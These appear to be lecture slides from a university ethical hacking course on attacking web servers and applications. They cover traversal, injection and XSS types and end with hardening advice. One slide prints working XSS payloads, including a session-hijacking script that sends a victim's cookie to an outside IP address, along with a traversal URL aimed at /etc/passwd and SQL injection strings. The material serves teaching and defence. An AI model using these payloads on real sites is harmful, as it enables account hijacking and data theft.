University of Babylon College of

information Technology
Department of Information Security

Ethical Hacking
Lecture 8: Hacking Web
Servers and Web
Applications

Asst.Lect. Rasha Hussein

 • The primary function of a web server is to cater a web page to the
requests of clients using the Hypertext Transfer Protocol (HTTP).
This means the delivery of HTML documents and any additional
content that may be included by a document, such as images, style
sheets, and scripts.
• A user agent, commonly a web browser or web crawler, initiates
communication by making a request for a specific resource using
HTTP and the server responds with the content of that resource or
an error message if unable to do so. The resource is typically a real
Understand file on the server's secondary storage, but this is not necessarily the
case and depends on how the web server is implemented.
Web Server
 • Web applications are programs that reside on a web
server to give the user functionality beyond just a
website. Database queries, webmail, discussion
groups, and blogs are all examples of web applications.
• A web application uses a client/server architecture,
Understand with a web browser as the client and the web server
acting as the application server. JavaScript is a popular
Web way to implement web applications. Since web
applications are widely implemented, any user with a
Application web browser can interact with most site utilities
Web Application Attacks
 Web Server Attacks

• DNS Amplification - uses recursive DNS to DoS a target; amplifies DNS answers to target until it
can't do anything. (Botnet)

• Directory Transversal (../ or dot-dot-slash) - requests file that should not be accessible from web
server Example: http://www.example.com/../../../../etc/password
 Web Server Attacks

• Parameter Tampering (URL Tampering) (IDOR) manipulating parameters within URL to achieve escalation
or other changes.
• Web Cache Poisoning - replacing the cache on a box with a malicious version of it.

• Password Attack - attempting to crack passwords related to web resources

• Misconfiguration Attack - same as before - improper configuration of a web server
 Web Server Attacks Methodology

Some of the common web server attack tools include: Metasploit , Mpack , Zeus, Neosplit
Web Server Architecture
 Web Application Attacks
• Most often hacked before of inherent weaknesses built into the program
• First step is to identify entry points (POST data, URL parameters, cookies, headers, etc.)
• Tools for Identifying Entry Points
• BurpSuite
• •Tools for Identifying Entry Points BURPSUITE
• Injection
• File Injection - attacker injects a pointer in a web form to an exploit hosted elsewhere
• Command Injection -attacker gains shell access using Java or similar
• SOAP Injection - inject query strings in order to bypass authenticationa
• SOAP uses XML to format information
• Messages are "one way" in nature
• LDAP Injection - exploits applications that construct LDAP statements
• Format for LDAP injection includes
• SQL Injection - injecting SQL commands into input fields to produce output single quote ('), Double dash (--), input "" OR 1=1 “
 Web Application Attacks

• Many web application threats exist on a web server. The following are the
most common threats:
• XSS
• Command Execution
• HTTP Brute Force
• Remote File Upload
• SQL Injection
• CSRF
 Cross-site Scripting (XSS)

• Understand Cross-site Scripting (XSS)

• Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts
are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS)
attacks occur when an attacker uses a web application to send malicious code, generally
in the form of a browser side script, to a different end user. Flaws that allow these
attacks to succeed are quite widespread and occur anywhere a web application uses
input from a user in the output it generates without validating or encoding it.
• An attacker can use XSS to send a malicious script to an unsuspecting user. The end
user’s browser has no way to know that the script should not be trusted, and will
execute the script. Because it thinks the script came from a trusted source, the
malicious script can access any cookies, session tokens, or other sensitive information
retained by your browser and used with that site. These scripts can even rewrite the
content of the HTML page.
 What are the types of XSS attacks?
• Reflected XSS (AKA Non-Persistent or Type I)
• Reflected XSS occurs when user input is immediately returned by a web application in an error message, search
result, or any other response that includes some or all of the input provided by the user as part of the request, without
that data being made safe to render in the browser, and without permanently storing the user provided data. In some
cases, the user provided data may never even leave the browser (see DOM Based XSS below).
• Stored XSS (AKA Persistent or Type II)
• Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum,
visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without
that data being made safe to render in the browser. With the advent of HTML5, and other browser technologies, we
can envision the attack payload being permanently stored in the victim’s browser, such as an HTML5 database, and
never being sent to the server at all.
• DOM Based XSS (AKA Type-0)
• DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is
executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side
script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is)
does not change, but the client side code contained in the page executes differently due to the malicious modifications
that have occurred in the DOM environment.
 Malicious script for XSS attack

• Reflected XSS Attacks Threat

• Find xss Vulnerabilitie
o <script>alert(‘rasha’)</script>
o <script>alert(document.cookie)</script>
o <script>document.location="http://google.com"</script>
• Reflected XSS Attacks with session hijacking
• <script>document.location='http://192.168.1.7/index.php?'+document.cookie;</scrip>
• Encoder script http://meyerweb.com/eric/tools/dencoder/
• Inject cookie by cookie manager +
 How to avoid attacks on Web server
• An organization can adopt the following policy to protect itself against web server attacks.
• Patch management– this involves installing patches to help secure the server. A patch is an update that
fixes a bug in the software. The patches can be applied to the operating system and the web server
system.
• Secure installation and configuration of the operating system
• Secure installation and configuration of the web server software
• Vulnerability scanning system– these include tools such as Snort, NMap, Scanner Access Now Easy
(SANE)
• Firewalls can be used to stop simple DoS attacks by blocking all traffic coming the identify source IP
addresses of the attacker.
• Antivirus software can be used to remove malicious software on the server
• Disabling Remote Administration
• Default accounts and unused accounts must be removed from the system
• Default ports & settings (like FTP at port 21) should be changed to custom port & settings (FTP port
at 5069)
Thank
You